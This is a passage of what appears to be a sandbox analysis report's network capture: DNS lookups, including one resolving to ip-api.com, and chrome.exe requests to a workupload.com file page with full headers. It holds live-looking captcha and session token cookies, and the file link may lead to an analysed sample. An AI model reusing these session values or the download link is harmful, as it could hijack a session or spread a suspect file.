                                            Server: Apache/2.4.57 (Debian)
                                            Access-Control-Allow-Origin: https://workupload.com
                                            Access-Control-Allow-Credentials: true
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                          • flag-us
                                            DNS
                                            162.201.250.142.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            162.201.250.142.in-addr.arpa
                                            IN PTR
                                            Response
                                            162.201.250.142.in-addr.arpa
                                            IN PTR
                                            par21s23-in-f21e100net
                                          • flag-us
                                            DNS
                                            www.google.com
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            www.google.com
                                            IN A
                                            Response
                                            www.google.com
                                            IN A
                                            172.217.20.196
                                          • flag-us
                                            DNS
                                            163.214.58.216.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            163.214.58.216.in-addr.arpa
                                            IN PTR
                                            Response
                                            163.214.58.216.in-addr.arpa
                                            IN PTR
                                            mad01s26-in-f31e100net
                                            163.214.58.216.in-addr.arpa
                                            IN PTR
                                            mad01s26-in-f163�H
                                            163.214.58.216.in-addr.arpa
                                            IN PTR
                                            par10s42-in-f3�H
                                          • flag-us
                                            DNS
                                            42.215.58.216.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            42.215.58.216.in-addr.arpa
                                            IN PTR
                                            Response
                                            42.215.58.216.in-addr.arpa
                                            IN PTR
                                            par21s17-in-f101e100net
                                          • flag-us
                                            DNS
                                            1.112.95.208.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            1.112.95.208.in-addr.arpa
                                            IN PTR
                                            Response
                                            1.112.95.208.in-addr.arpa
                                            IN PTR
                                            ip-apicom
                                          • flag-us
                                            DNS
                                            78.179.250.142.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            78.179.250.142.in-addr.arpa
                                            IN PTR
                                            Response
                                            78.179.250.142.in-addr.arpa
                                            IN PTR
                                            par21s19-in-f141e100net
                                          • flag-us
                                            DNS
                                            53.130.130.94.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            53.130.130.94.in-addr.arpa
                                            IN PTR
                                            Response
                                            53.130.130.94.in-addr.arpa
                                            IN PTR
                                            static5313013094clients your-serverde
                                          • flag-us
                                            DNS
                                            www.gstatic.com
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            www.gstatic.com
                                            IN A
                                            Response
                                            www.gstatic.com
                                            IN A
                                            216.58.214.163
                                          • flag-us
                                            DNS
                                            142.178.250.142.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            142.178.250.142.in-addr.arpa
                                            IN PTR
                                            Response
                                            142.178.250.142.in-addr.arpa
                                            IN PTR
                                            par21s22-in-f141e100net
                                          • flag-us
                                            DNS
                                            29.243.111.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            29.243.111.52.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            162.126.13.49.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            162.126.13.49.in-addr.arpa
                                            IN PTR
                                            Response
                                            162.126.13.49.in-addr.arpa
                                            IN PTR
                                            static1621261349clients your-serverde
                                          • flag-us
                                            DNS
                                            67.214.58.216.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            67.214.58.216.in-addr.arpa
                                            IN PTR
                                            Response
                                            67.214.58.216.in-addr.arpa
                                            IN PTR
                                            fra15s10-in-f671e100net
                                            67.214.58.216.in-addr.arpa
                                            IN PTR
                                            fra15s10-in-f3�H
                                            67.214.58.216.in-addr.arpa
                                            IN PTR
                                            par10s39-in-f3�H
                                          • flag-us
                                            DNS
                                            content-autofill.googleapis.com
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            content-autofill.googleapis.com
                                            IN A
                                            Response
                                            content-autofill.googleapis.com
                                            IN A
                                            216.58.215.42
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.179.74
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.179.106
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.178.138
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.201.170
                                            content-autofill.googleapis.com
                                            IN A
                                            142.250.75.234
                                            content-autofill.googleapis.com
                                            IN A
                                            216.58.214.170
                                            content-autofill.googleapis.com
                                            IN A
                                            172.217.20.170
                                            content-autofill.googleapis.com
                                            IN A
                                            172.217.20.202
                                          • flag-us
                                            DNS
                                            174.20.217.172.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            174.20.217.172.in-addr.arpa
                                            IN PTR
                                            Response
                                            174.20.217.172.in-addr.arpa
                                            IN PTR
                                            par10s49-in-f141e100net
                                            174.20.217.172.in-addr.arpa
                                            IN PTR
                                            waw02s07-in-f174�I
                                            174.20.217.172.in-addr.arpa
                                            IN PTR
                                            waw02s07-in-f14�I
                                          • flag-us
                                            DNS
                                            nexusrules.officeapps.live.com
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            nexusrules.officeapps.live.com
                                            IN A
                                            Response
                                            nexusrules.officeapps.live.com
                                            IN CNAME
                                            prod.nexusrules.live.com.akadns.net
                                            prod.nexusrules.live.com.akadns.net
                                            IN A
                                            52.111.243.29
                                          • flag-de
                                            POST
                                            https://workupload.com/captcha
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            POST /captcha HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            Content-Length: 22
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Accept: application/json, text/javascript, */*; q=0.01
                                            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                            X-Requested-With: XMLHttpRequest
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Origin: https://workupload.com
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%226lFpElVSnJPd4zuGDnERJ08%5C%2FiG27r%5C%2FBAl6LmoDLdbSXzB%2BRMLU6N7D1Y39hZ7p%5C%2FpmMUSw%5C%2FJPYRAa4g9KLilVaFbmquQNxDUVOj%5C%2FoYrdHmyE9N5d7PMDi%5C%2FKgpFEGMzy0AUTOnm3JicitGzGCbd0o%2BowoL4SY%2BbPQxc9coy1g8ngs%3D%22%7D
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Set-Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; expires=Sat, 15-Jun-2024 06:57:05 GMT; Max-Age=2592000; path=/; domain=.workupload.com
                                            Content-Length: 0
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://workupload.com/file/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /file/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            Cache-Control: max-age=0
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-Dest: document
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Set-Cookie: token=dog3cr8m9coprihlvsgptlfoci; expires=Thu, 16-May-2024 12:57:05 GMT; Max-Age=21600; path=/; domain=.workupload.com; HttpOnly
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 2958
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://workupload.com/translations.js?en
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /translations.js?en HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Expires: Thu, 16 May 2024 07:57:05 GMT
                                            Pragma: cache
                                            Cache-Control: max-age=3600
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 19475
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: application/javascript
                                          • flag-de
                                            GET
                                            https://workupload.com/favicon.ico
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /favicon.ico HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%226lFpElVSnJPd4zuGDnERJ08%5C%2FiG27r%5C%2FBAl6LmoDLdbSXzB%2BRMLU6N7D1Y39hZ7p%5C%2FpmMUSw%5C%2FJPYRAa4g9KLilVaFbmquQNxDUVOj%5C%2FoYrdHmyE9N5d7PMDi%5C%2FKgpFEGMzy0AUTOnm3JicitGzGCbd0o%2BowoL4SY%2BbPQxc9coy1g8ngs%3D%22%7D
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "18f1c-60e5f59ac54ec"
                                            Accept-Ranges: bytes
                                            Content-Length: 102172
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: image/vnd.microsoft.icon
                                          • flag-de
                                            GET
                                            https://workupload.com/js/39b9ad5.js?v=KUUBLA72
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /js/39b9ad5.js?v=KUUBLA72 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: script
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "59171-60e5f59ac742c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Transfer-Encoding: chunked
                                            Content-Type: application/javascript
                                          • flag-de
                                            GET
                                            https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /css/4280ebd.css?v=KUUBLA72 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: text/css,*/*;q=0.1
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: style
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Fri, 23 Feb 2024 14:17:19 GMT
                                            ETag: "34295-6120d37c4bb6c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Content-Length: 35970
                                            Keep-Alive: timeout=5, max=98
                                            Connection: Keep-Alive
                                            Content-Type: text/css
                                          • flag-de
                                            GET
                                            https://workupload.com/bundles/app/img/workupload_logo_small.svg
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /bundles/app/img/workupload_logo_small.svg HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "907-60e5f59ac454c-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Cache-control: public, max-age=3600
                                            Content-Length: 1282
                                            Keep-Alive: timeout=5, max=97
                                            Connection: Keep-Alive
                                            Content-Type: image/svg+xml
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                          • flag-de
                                            GET
                                            https://workupload.com/qr/file/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /qr/file/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:05 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Transfer-Encoding: chunked
                                            Content-Type: image/png
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/fontawesome-webfont.woff2?v=4.7.0
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "12d68-60e5f59ac54ec"
                                            Accept-Ranges: bytes
                                            Content-Length: 77160
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: font/woff2
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-regular.woff2 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
